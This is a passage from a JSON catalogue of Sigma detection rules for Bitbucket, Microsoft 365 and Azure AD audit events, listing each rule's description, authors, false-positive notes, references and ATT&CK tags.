], "filename": "bitbucket_audit_user_permissions_export_attempt_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_permissions_export_attempt_detected.yml" ], "tags": [ "attack.reconnaissance", "attack.t1213", "attack.t1082", "attack.t1591.004" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "87cc6698-3e07-4ba2-9b43-a85a73e151e2", "value": "Bitbucket User Permissions Export Attempt" }, { "description": "Detects the addition of a new Federated Domain.", "meta": { "author": "Splunk Threat Research Team (original rule), '@ionsor (rule)'", "creation_date": "2022-02-08", "falsepositive": [ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." 
], "filename": "microsoft365_new_federated_domain_added_exchange.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://o365blog.com/post/aadbackdoor/", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", "https://www.sygnia.co/golden-saml-advisory", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", "value": "New Federated Domain Added - Exchange" }, { "description": "Detects the addition of a new Federated Domain.", "meta": { "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", "creation_date": "2023-09-18", "falsepositive": [ "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." 
], "filename": "microsoft365_new_federated_domain_added_audit.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/", "https://o365blog.com/post/aadbackdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_new_federated_domain_added_audit.yml" ], "tags": [ "attack.persistence", "attack.t1136.003" ] }, "related": [ { "dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "58f88172-a73d-442b-94c9-95eaed3cbb36", "value": "New Federated Domain Added" }, { "description": "Detects disabling of Multi Factor Authentication.", "meta": { "author": "Splunk Threat Research Team (original rule), Harjot Singh @cyb3rjy0t (sigma rule)", "creation_date": "2023-09-18", "falsepositive": [ "Unlikely" ], "filename": "microsoft365_disabling_mfa.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/audit/microsoft365_disabling_mfa.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60de9b57-dc4d-48b9-a6a0-b39e0469f876", "value": "Disabling Multi Factor Authentication" }, { "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_activity_from_infrequent_country.yml", "level": 
"medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_infrequent_country.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f2468a2-5055-4212-a368-7321198ee706", "value": "Activity from Infrequent Country" }, { "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2020-07-06", "falsepositive": [ "Unknown" ], "filename": "microsoft365_impossible_travel_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_impossible_travel_activity.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", "value": "Microsoft 365 - Impossible Travel Activity" }, { "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", "meta": { "author": "Austin Songer 
@austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "User using a VPN or Proxy" ], "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_from_anonymous_ip_addresses.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", "value": "Activity from Anonymous IP Addresses" }, { "description": "Detects when a Microsoft Cloud App Security reported that a user has deleted an unusually large volume of files.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_unusual_volume_of_file_deletion.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_unusual_volume_of_file_deletion.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", "value": "Microsoft 365 - Unusual Volume of File Deletion" }, { "description": "Detects when a Microsoft Cloud App Security 
reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-22", "falsepositive": [ "Unknown" ], "filename": "microsoft365_susp_inbox_forwarding.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_inbox_forwarding.yml" ], "tags": [ "attack.exfiltration", "attack.t1020" ] }, "related": [ { "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", "value": "Suspicious Inbox Forwarding" }, { "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", "value": "Suspicious OAuth App File Download Activities" }, { "description": "Alert on 
when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", "meta": { "author": "Sorina Ionescu", "creation_date": "2022-02-08", "falsepositive": [ "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." ], "filename": "microsoft365_pst_export_alert.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert.yml" ], "tags": [ "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", "value": "PST Export Alert Using eDiscovery Alert" }, { "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_user_restricted_from_sending_email.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml" ], "tags": [ "attack.initial-access", "attack.t1199" ] }, "related": [ { "dest-uuid": "9fa07bef-9c81-421e-a8e5-ad4366c5a925", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", "value": "Microsoft 365 - User Restricted from Sending Email" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", "meta": { "author": "austinsonger", "creation_date": "2021-08-19", "falsepositive": [ "Unknown" ], "filename": "microsoft365_potential_ransomware_activity.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_potential_ransomware_activity.yml" ], "tags": [ "attack.impact", "attack.t1486" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", "value": "Microsoft 365 - Potential Ransomware Activity" }, { "description": "Detects when a Microsoft Cloud App Security reported users whose accounts were terminated in Azure AD, but who still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_activity_by_terminated_user.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", 
"https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_activity_by_terminated_user.yml" ], "tags": [ "attack.impact" ] }, "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", "value": "Activity Performed by Terminated User" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_logon_from_risky_ip_address.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_logon_from_risky_ip_address.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", "value": "Logon from a Risky IP Address" }, { "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", 
"https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml" ], "tags": [ "attack.exfiltration", "attack.t1537" ] }, "related": [ { "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", "value": "Data Exfiltration to Unsanctioned Apps" }, { "description": "Alert when a user has performed an export of a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in O365. This rule applies to ExchangePowerShell usage and to actions performed from the cloud.", "meta": { "author": "Nikita Khalimonenkov", "creation_date": "2022-11-17", "falsepositive": [ "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." 
], "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_management/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" ], "tags": [ "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6897cd82-6664-11ed-9022-0242ac120002", "value": "PST Export Alert Using New-ComplianceSearchAction" }, { "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "microsoft365_from_susp_ip_addresses.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "m365", "refs": [ "https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference", "https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/threat_detection/microsoft365_from_susp_ip_addresses.yml" ], "tags": [ "attack.command-and-control", "attack.t1573" ] }, "related": [ { "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "value": "Activity from Suspicious IP Addresses" }, { "description": "Monitor and alert 
on group membership removal of groups that have CA policy modification access", "meta": { "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", "creation_date": "2022-08-04", "falsepositive": [ "User removed from the group is approved" ], "filename": "azure_group_user_removal_ca_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_removal_ca_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", "value": "User Removed From Group With CA Policy Modification Access" }, { "description": "Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\nThreat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.\n", "meta": { "author": "Harjot Singh (@cyb3rjy0t)", "creation_date": "2024-08-21", "falsepositive": [ "Legitimate authorized activity." 
], "filename": "azure_user_account_mfa_disable.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml" ], "tags": [ "attack.credential-access", "attack.persistence" ] }, "uuid": "b18454c8-0be3-41f7-86bc-9c614611b839", "value": "Multi Factor Authentication Disabled For User Account" }, { "description": "Monitor and alert for users added to device admin roles.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_users_added_to_device_admin_roles.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_users_added_to_device_admin_roles.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11c767ae-500b-423b-bae3-b234450736ed", "value": "Users Added to Global or Device Admin Roles" }, { "description": "Detects when a new admin is created.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "A legitimate new admin account being created" ], "filename": "azure_privileged_account_creation.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ 
"https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_privileged_account_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", "value": "Privileged Account Creation" }, { "description": "Detects when a user is added to a privileged role.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-06", "falsepositive": [ "Legitimate administrator actions of adding members to a role" ], "filename": "azure_priviledged_role_assignment_add.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "value": "User Added To Privilege Role" }, { "description": "Monitor and alert for changes to the device registration policy.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_device_registration_policy_changes.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", 
"refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_device_registration_policy_changes.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1484" ] }, "related": [ { "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", "value": "Changes to Device Registration Policy" }, { "description": "Detects guest users being invited to tenant by non-approved inviters", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", "value": "Guest Users Invited To Tenant By Non Approved Inviters" }, { "description": "Monitor and alert on conditional access changes.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-18", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
], "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", "value": "New CA Policy by Non-approved Actor" }, { "description": "Identifies when a user or application modifies the federation settings on the domain.", "meta": { "author": "Austin Songer", "creation_date": "2021-09-06", "falsepositive": [ "Federation Settings being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Federation Settings modified by unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
], "filename": "azure_federation_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_federation_modified.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", "value": "Azure Domain Federation Settings Modified" }, { "description": "Detects when an end user consents to an application", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "Unknown" ], "filename": "azure_app_end_user_consent.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "value": "End User Consent" }, { "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-10", "falsepositive": [ "A non malicious user is unaware of the proper process" ], "filename": "azure_guest_invite_failure.yml", "level": "medium", "logsource.category": 
"No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "value": "Guest User Invited By Non Approved Inviters" }, { "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-10", "falsepositive": [ "Administrator adding a legitimate temporary access pass" ], "filename": "azure_tap_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_tap_added.yml" ], "tags": [ "attack.persistence", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "value": "Temporary Access Pass Added To An Account" }, { "description": "Detect when a user has reset their password in Azure AD", "meta": { "author": "YochanaHenderson, '@Yochana-H'", "creation_date": "2022-08-03", "falsepositive": [ "If this was approved by System Administrator or confirmed user action." 
], "filename": "azure_user_password_change.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_password_change.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", "value": "Password Reset By User Account" }, { "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-05-26", "falsepositive": [ "When credentials are added/removed as part of the normal working hours/workflows" ], "filename": "azure_app_credential_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_credential_added.yml" ], "tags": [ "attack.t1098.001", "attack.persistence" ] }, "related": [ { "dest-uuid": 